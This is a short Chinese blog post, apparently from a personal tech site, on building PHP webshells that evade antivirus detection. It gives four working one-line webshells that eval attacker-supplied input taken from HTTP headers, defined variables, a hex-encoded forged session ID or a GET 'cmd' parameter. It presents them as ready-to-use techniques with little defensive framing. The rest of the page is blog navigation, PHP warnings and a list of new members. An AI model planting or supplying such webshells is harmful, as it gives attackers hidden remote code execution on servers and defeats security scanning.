PHP利用Apache、Nginx的特性实现免杀Webshell

一些小笔记
19年2月14日
编辑

纯七站长

get_defined_vars()、getallheaders()是两个特性函数，我们可以通过这两个函数来构造我们的webshell。

环境	函数	用法
nginx	get_defined_vars()	返回由所有已定义变量所组成的数组
apache	getallheaders()	返回由所有已定义变量所组成的数组

apache环境

<?php
eval(next(getallheaders())); 
?>

PHP利用Apache、Nginx的特性实现免杀Webshell

apache和nginx环境通用

<?php
eval(implode(reset(get_defined_vars())));
?>

PHP利用Apache、Nginx的特性实现免杀Webshell

另外一种通过执行伪造的sessionid值，进行任意代码执行。

<?php
eval(hex2bin(session_id(session_start())));
?>

PHP利用Apache、Nginx的特性实现免杀Webshell

706870696e666f28293b这个是phpinfo();的hex编码。

给shell加密码

<?php eval(get_defined_vars()['_GET']['cmd']);?>

给TA打赏

共{{data.count}}人

人已打赏

一些小笔记

NGINX编译安装及主机配置分离

2019-2-8 12:50:41

一些小笔记

web容器上传文件利用方式总结

2019-2-14 1:28:40

0 条回复 A文章作者 M管理员

更换删除

暂无讨论，说说你的看法吧

1

强国助手 v2.22 使用文档（停止维护）
21年5月12日
2

纯七影视发布页-产品文档
22年2月27日
3

记一次官网删库恢复事件
20年3月5日
4

祝前程繁华似锦
19年8月11日
5

各大网站URL收录提交地址分享
18年1月29日
6

水文
19年9月8日

来自：

❯

个人中心

购物车

优惠劵

今日签到

有新私信私信列表

搜索

客服

扫码打开当前页

返回顶部

幸运之星正在降临...

点击领取今天的签到奖励！

恭喜！您今天获得了{{mission.data.mission.credit}}积分

今日签到

连续签到

{{item.credit}}

连续{{item.count}}天

查看所有

我的优惠劵

_￥_优惠劵

使用时效：无法使用

使用时效：
之前

使用时效：永久有效

优惠劵ID：
×

限制以下商品使用：限制以下商品分类使用：不限制使用：

[{{ct.name}}]

所有商品和商品类型均可使用

没有优惠劵可用!

购物车

×

删除

购物车空空如也!

清空购物车前往结算

您有新的私信

没有新私信

写新私信查看全部

Warning: Undefined array key "avatar" in /www/wwwroot/blog.xzbzq.com/wp-content/themes/b2Jitheme/jitheme_functions.php on line 397

Warning: Undefined array key "name" in /www/wwwroot/blog.xzbzq.com/wp-content/themes/b2Jitheme/jitheme_functions.php on line 397

Warning: Undefined array key "avatar" in /www/wwwroot/blog.xzbzq.com/wp-content/themes/b2Jitheme/jitheme_functions.php on line 397

Warning: Undefined array key "name" in /www/wwwroot/blog.xzbzq.com/wp-content/themes/b2Jitheme/jitheme_functions.php on line 397

brucemarra705加入本站，鼓掌欢迎！

纯七发布圈子单身三年现状

纯七发布圈子单身三年现状

xiaoyu加入本站，鼓掌欢迎！

对文章纯七AI助手和纯七AI API中转站关系解答篇发布评论！

对文章腾讯音乐人认证教程发布评论！

melindacoolidge加入本站，鼓掌欢迎！

henriettasmiley加入本站，鼓掌欢迎！

躯壳里的战鸣加入本站，鼓掌欢迎！

brigittew50加入本站，鼓掌欢迎！

michellrivett42加入本站，鼓掌欢迎！

tammara61s加入本站，鼓掌欢迎！

cornelius8111加入本站，鼓掌欢迎！

marielmauldin33加入本站，鼓掌欢迎！

mellisahardey6加入本站，鼓掌欢迎！

nn加入本站，鼓掌欢迎！

笙歌醉梦加入本站，鼓掌欢迎！

hHH加入本站，鼓掌欢迎！

emmettwaldock加入本站，鼓掌欢迎！

muhammadirwin06加入本站，鼓掌欢迎！

此昵称存在加入本站，鼓掌欢迎！

12加入本站，鼓掌欢迎！

katrinmckerihan加入本站，鼓掌欢迎！

lashawndaboudrea加入本站，鼓掌欢迎！

scaneraSiZ加入本站，鼓掌欢迎！

stormylarcombe加入本站，鼓掌欢迎！

christoperxsj加入本站，鼓掌欢迎！

grettablanchard加入本站，鼓掌欢迎！

vernonbardin44加入本站，鼓掌欢迎！

不可描述加入本站，鼓掌欢迎！